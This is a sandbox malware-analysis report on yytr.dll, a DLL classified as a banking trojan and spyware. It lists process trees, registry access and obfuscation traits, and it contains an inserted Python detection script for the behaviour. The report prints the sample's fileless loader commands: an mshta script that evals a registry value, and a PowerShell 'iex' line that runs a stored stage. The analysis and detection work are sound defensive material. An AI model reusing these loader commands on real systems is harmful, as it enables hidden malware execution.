Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 00403EBC appears 75 times
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 00406224 appears 61 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00403EBC appears 77 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00406224 appears 61 times
One or more processes crash
Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756
PE file contains strange resources
Source: yytr.dll Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
PE file does not import any functions
Source: maejgtwh.dll.35.dr Static PE information: No import functions for PE file found
Source: qxfma03s.dll.33.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: yytr.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@47/76@10/3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00420AE8 GetLastError,FormatMessageA, 0_2_00420AE8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004085C6 GetDiskFreeSpaceA, 0_2_004085C6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F382EB CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_02F382EB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00416AE4 FindResourceA, 0_2_00416AE4
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0A3DC979-6AC5-11EB-90EB-ECF4BBEA1588}.dat
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{305FBD52-CFE8-E23F-D964-73361DD857CA}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{7C7FA6C6-ABD4-0EE2-1570-0F2219A4B376}
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4576
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{8C972E34-7B6D-9E84-6580-DFB269B48306}
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B01.tmp
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1
Source: yytr.dll Virustotal: Detection: 43%
Source: yytr.dll ReversingLabs: Detection: 39%
Source: loaddll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\yytr.dll'
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp
Source: Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
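The three process-creation lines above describe one chain: mshta.exe starts powershell.exe, the PowerShell command line reads a registry value (Barclers under HKCU\Software\AppDataLow\Software\Microsoft\54E80703-...) and hands it straight to Invoke-Expression, so the next stage never touches disk as a script file, and that PowerShell stage then drives csc.exe with a response file under %LOCALAPPDATA%\Temp. The detection logic below is an added example, not part of the report and not Joe Sandbox code; it runs over constructed process events whose command lines are modelled on the ones printed here (the PIDs and parent links are assumed) and emits one alert per technique, which is how the "MSHTA Spawning Windows Shell", "Suspicious powershell command line" and "Dot net compiler compiles file from suspicious location" findings would be reproduced from Sysmon event 1 or 4688 data:

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events: PIDs and parent links are assumptions, the command lines are
# modelled on the ones in this report.
EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\System32\mshta.exe", "mshta.exe"),
    ProcEvent(4552, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp "
              "'HKCU:Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))"),
    ProcEvent(5100, 4552, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"csc.exe /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'"),
    # Benign control: reads a registry value but never pipes it into Invoke-Expression.
    ProcEvent(6000, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe (gp 'HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run').Foo"),
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Invoke-Expression (or its alias) fed from a registry read: the stage lives in a value.
IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
REGREAD_RE = re.compile(r"\b(gp|get-itemproperty|gpv|get-itempropertyvalue)\b.*hk(cu|lm|ey_)", re.I)
# csc.exe/vbc.exe driven by a @response file under a user-writable temp directory.
CSC_TEMP_RE = re.compile(r"""@['"]?[^'"]*\\appdata\\local\\temp\\[^'"]*\.cmdline""", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) tuples for every event that matches one of the three rules."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if pname == "mshta.exe" and name in SHELLS:
            alerts.append(("mshta_spawns_shell", e.pid))
        if name in POWERSHELL and IEX_RE.search(e.cmdline) and REGREAD_RE.search(e.cmdline):
            alerts.append(("iex_from_registry_value", e.pid))
        if name in {"csc.exe", "vbc.exe"} and CSC_TEMP_RE.search(e.cmdline):
            alerts.append(("csc_compile_from_temp", e.pid))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

The second rule is the one worth keeping strict: a registry read on its own is routine administration (the control event shows that), it is the combination with iex/Invoke-Expression that marks a registry-resident loader. For triage, the same gp expression with Write-Output in place of iex recovers the stored stage without running it.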
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042743C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042743C
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00453E60 push 00453EEDh; ret 0_2_00453EE5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00406040 push 0040606Ch; ret 0_2_00406064
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004160F0 push ecx; mov dword ptr [esp], edx 0_2_004160F5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00418174 push ecx; mov dword ptr [esp], ecx 0_2_00418179
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00414104 push 00414151h; ret 0_2_00414149
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00416134 push ecx; mov dword ptr [esp], edx 0_2_00416139
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004143CF push 004144A8h; ret 0_2_004144A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0041447C push 004144A8h; ret 0_2_004144A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428404 push 0042845Dh; ret 0_2_00428455
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0041C53C push ecx; mov dword ptr [esp], edx 0_2_0041C53E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0045860C push 0045863Fh; ret 0_2_00458637
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428A7C push 00428ABFh; ret 0_2_00428AB7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428AF4 push 00428B20h; ret 0_2_00428B18
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00406ABC push ecx; mov dword ptr [esp], eax 0_2_00406ABD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0043CB50 push 0043CB7Ch; ret 0_2_0043CB74
